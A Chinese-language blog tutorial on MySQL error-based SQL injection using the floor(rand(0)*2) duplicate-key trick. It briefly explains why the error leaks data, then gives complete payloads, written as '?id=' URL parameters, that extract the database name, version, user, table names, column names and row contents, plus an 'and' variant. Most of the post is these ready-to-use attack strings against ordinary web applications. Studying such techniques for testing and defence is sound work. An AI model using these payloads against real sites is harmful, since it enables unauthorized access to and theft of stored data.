利用floor(rand(0)*2)报错返回信息
一、报错原理
rand(0) 在 group by 分组过程中会被多次求值，使 concat 出的分组键在写入临时表时出现重复，MySQL 随即抛出 "Duplicate entry ... for key" 错误，而该错误信息中原样带出了分组键里 payload 子查询的结果，这就是信息得以回显的原因。
二、通用格式
?id=1 union select (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)
//将需要执行的子查询填入 payload 处即可
三、利用报错返回信息
- 返回数据库名称、版本信息、用户名称
// payload
(select concat(0x7e,database(),0x7e,version(),0x7e,user(),0x7e)
// 整体语句
id=1 union select (select 1 from(select count(*),concat((select concat(0x7e,database(),0x7e,version(),0x7e,user(),0x7e)),floor(rand(0)*2))x from information_schema.tables group by x)a);
- 返回该数据库中表信息
// payload
(select concat(0x7e,table_name,0x7e)from information_schema.tables where table_schema=database() limit 0,1)
//注意用 table_schema 指定当前数据库，否则最先返回的是 information_schema 自身的表名
// 整体语句
?id=1 union select (select 1 from (select count(*),concat((select concat(0x7e,table_name,0x7e)from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- 返回列信息
//payload
(select concat(0x7e,column_name,0x7e)from information_schema.columns where table_name='region' limit 0,1)
//整体语句
?id=1 union select (select 1 from (select count(*),concat( (select concat(0x7e,column_name,0x7e)from information_schema.columns where table_name='region' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
//依次修改 limit 的偏移量，即可逐个获得全部列名
- 获得字段值
//payload
(select concat(0x7e,id,0x7e,pid,0x7e,name,0x7e,type,0x7e)from region limit 0,1)
//整体语句
?id=1 union select (select 1 from (select count(*),concat((select concat(0x7e,id,0x7e,pid,0x7e,name,0x7e,type,0x7e)from region limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
可将 union select 替换为 and，整体语句即为：
?id=1 and (select 1 from (select count(*),concat((select concat(0x7e,id,0x7e,pid,0x7e,name,0x7e,type,0x7e)from region limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
本文地址:https://blog.csdn.net/weixin_44940180/article/details/107633091